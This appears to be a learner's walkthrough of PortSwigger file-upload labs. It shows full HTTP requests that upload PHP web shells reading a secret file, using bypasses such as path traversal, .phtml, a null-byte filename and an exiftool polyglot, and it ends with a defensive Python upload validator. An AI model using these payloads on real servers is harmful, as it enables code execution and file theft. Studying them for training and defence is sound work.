File Upload Labs Overview

File Upload

Current Lab

https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-race-condition

Stuck on this one. Maybe I will have to send the requests in bulk (via a script or Intruder) to exploit the race condition.

Completed Labs

  1. Lab : https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

Request is :

POST /my-account/avatar HTTP/1.1
Host: ac001ff71f84373ec0250aad009900f6.web-security-academy.net
Cookie: session=oNfNC6EV6EeWRhPFR20s8YFSNB1vhCIY
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac001ff71f84373ec0250aad009900f6.web-security-academy.net/my-account
Content-Type: multipart/form-data; boundary=---------------------------54678472011940128371129110003
Content-Length: 580
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="avatar"; filename="index.php"
Content-Type: text/plain

<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="user"

wiener
-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="csrf"

CyWcDOIewMR1vVCz9Z5SyAIUvX635o7I
-----------------------------54678472011940128371129110003--
  2. Lab: https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass

Request is the same as before.

Here we don't change the content type; we just upload a file with a .php extension.

Response (screenshot not reproduced here):


  3. Lab: https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-path-traversal

Request is :

POST /my-account/avatar HTTP/1.1
Host: ac741f831fb332fcc08fcbde003e00fb.web-security-academy.net
Cookie: session=0foxB7Zs6s6U7kHmBeP4q6Je9t7CNn4R
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac741f831fb332fcc08fcbde003e00fb.web-security-academy.net/my-account
Content-Type: multipart/form-data; boundary=---------------------------16141849379546297572049735286
Content-Length: 582
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="avatar"; filename="..%2f62.php"
Content-Type: image/jpeg

<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="user"

wiener
-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="csrf"

o9jIgJxyGwddrZnTAle7fiiafGj20cEu
-----------------------------16141849379546297572049735286--

Response is :

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 04:55:05 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 132

The file avatars/../62.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>

File content (screenshot not reproduced here):


  4. Lab: https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-extension-blacklist-bypass

The .php extension is blacklisted, so I used .phtml from this site.

The most important part of the request is below:

Content-Disposition: form-data; name="avatar"; filename="p.phtml"
Content-Type: image/jpeg

<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>

The file gets uploaded without any trouble.

The result (screenshot not reproduced here):


  5. Lab: https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-obfuscated-file-extension

The backend only accepts files with a .png or .jpg extension, so we can't upload files ending in .php. We therefore used a null byte so that the .jpg extension is ignored; the filename is p.php%00.jpg.

Request is:

Content-Disposition: form-data; name="avatar"; filename="p.php%00.jpg"
Content-Type: image/jpeg

<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>

  6. Lab: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload

Here the backend reads the incoming file and checks whether it is a valid JPEG or PNG.

  1. We used exiftool to add PHP code to a JPEG file:
     ./exiftool -Comment='<?php $path = "/home/carlos/secret"; $fileContent = file_get_contents($path); echo $fileContent; echo "hey wassup" ?>' ../test.jpg
  2. Then we uploaded the file as test.php.
  3. When we open files/avatars/test.php we see the following response (screenshot not reproduced here):


Here it is hard to find the required output. I added "hey wassup" so that I could search for it, but the browser search was not finding it. Eventually I was able to locate it.


The secret key is M2eMeYXz2bsSAEfwRNsLim3vILBtloiY and not wM.... I had to submit it multiple times until I got the correct one. Maybe add a known string like "hey wassup" both before and after the required value next time.
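The labs above each beat one weak check (Content-Type header, extension blacklist, null byte, encoded path traversal, a validate-after-write race, and a polyglot that passes image validation). As an added example that is not part of these notes or of the PortSwigger labs, the following Python validator shows what an upload handler has to do to close all of them at once, using the lab filenames as constructed test inputs. The `MAGIC` table, the `staging_dir`/`avatar_dir` layout and the `UploadRejected` error are assumptions of this example, not anything the lab server does.

```python
import os
import re
import secrets
import tempfile
from urllib.parse import unquote

# Constructed table of magic bytes for the only image types the avatar endpoint
# accepts. The bytes decide the stored extension, not the client's filename
# or Content-Type header.
MAGIC = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}

class UploadRejected(ValueError):
    """Raised for any upload that fails validation."""

def safe_extension(filename: str) -> str:
    """Return the allowlisted extension of a client-supplied filename.

    Rejects the filename tricks from the labs above: raw or URL-encoded path
    separators (..%2f62.php), embedded null bytes (p.php%00.jpg), and any
    extension outside the allowlist (.php, .phtml, double extensions).
    """
    if not filename:
        raise UploadRejected("empty filename")
    decoded = unquote(filename)  # decode once so %2f and %00 are inspected as characters
    if "\x00" in decoded:
        raise UploadRejected("null byte in filename")
    if "/" in decoded or "\\" in decoded or ".." in decoded:
        raise UploadRejected("path separator or traversal in filename")
    parts = decoded.lower().split(".")
    # Exactly <name>.<ext>; a second dot would let shell.php.jpg-style names through.
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        raise UploadRejected("filename must be <name>.<ext> with a simple name")
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    if ext not in MAGIC:
        raise UploadRejected(f"extension .{ext} not allowed")
    return ext

def detect_type(data: bytes) -> str:
    """Identify the content by magic bytes; anything else is rejected."""
    for ext, sig in MAGIC.items():
        if data.startswith(sig):
            return ext
    raise UploadRejected("content is not a JPEG or PNG")

def store_upload(filename, content_type, data, staging_dir, avatar_dir):
    """Validate an upload and publish it atomically; returns the served name.

    Bytes are written to staging_dir (outside the web root) and renamed into
    avatar_dir only after every check has passed, so no unvalidated file is
    ever reachable by URL (the window the race-condition lab relies on).
    Both directories are assumed to be on one filesystem so os.replace is atomic.
    """
    ext = safe_extension(filename)
    if content_type not in ("image/jpeg", "image/png"):  # sanity check only: header is client-controlled
        raise UploadRejected("unexpected Content-Type header")
    real = detect_type(data)
    if real != ext:
        raise UploadRejected(f"extension .{ext} does not match content ({real})")
    served_name = f"{secrets.token_hex(16)}.{real}"  # server-generated; client name never reaches disk
    fd, tmp_path = tempfile.mkstemp(dir=staging_dir)
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)
            f.flush()
            os.fsync(f.fileno())
        os.replace(tmp_path, os.path.join(avatar_dir, served_name))
    except BaseException:
        if os.path.exists(tmp_path):
            os.unlink(tmp_path)
        raise
    return served_name

# Constructed samples: the filenames from the labs above plus two benign uploads.
SAMPLES = [
    ("index.php", "text/plain", b"<?php echo 1; ?>"),
    ("..%2f62.php", "image/jpeg", b"<?php echo 1; ?>"),
    ("p.phtml", "image/jpeg", b"<?php echo 1; ?>"),
    ("p.php%00.jpg", "image/jpeg", b"<?php echo 1; ?>"),
    ("shell.jpg", "image/jpeg", b"<?php echo 1; ?>"),               # image name, script body
    ("test.php", "image/jpeg", MAGIC["jpg"] + b"<?php echo 1; ?>"),  # polyglot uploaded as .php
    ("test.jpg", "image/jpeg", MAGIC["jpg"] + b"<?php echo 1; ?>"),  # polyglot with image extension
    ("avatar.png", "image/png", MAGIC["png"] + bytes(16)),
]

def run_demo() -> dict:
    """Push every sample through store_upload and return {filename: outcome}."""
    staging, avatars = tempfile.mkdtemp(prefix="staging_"), tempfile.mkdtemp(prefix="avatars_")
    outcomes = {}
    for name, ctype, data in SAMPLES:
        try:
            outcomes[name] = "stored as " + store_upload(name, ctype, data, staging, avatars)
        except UploadRejected as exc:
            outcomes[name] = "rejected: " + str(exc)
    return outcomes

if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name:15} -> {outcome}")
```

Running `run_demo()` rejects every lab filename except `test.jpg`: the polyglot with an image extension passes the magic-byte check, which is exactly what the last lab demonstrates. The validator cannot tell a JPEG with PHP in its comment field from a clean one, so the remaining defence is in how the file is stored, not in the checks: the served name is server-generated with an extension derived from the content, and the avatar directory must be one the web server never treats as executable. Re-encoding images to strip metadata is a further layer, but it needs an image library and is outside this stdlib-only example.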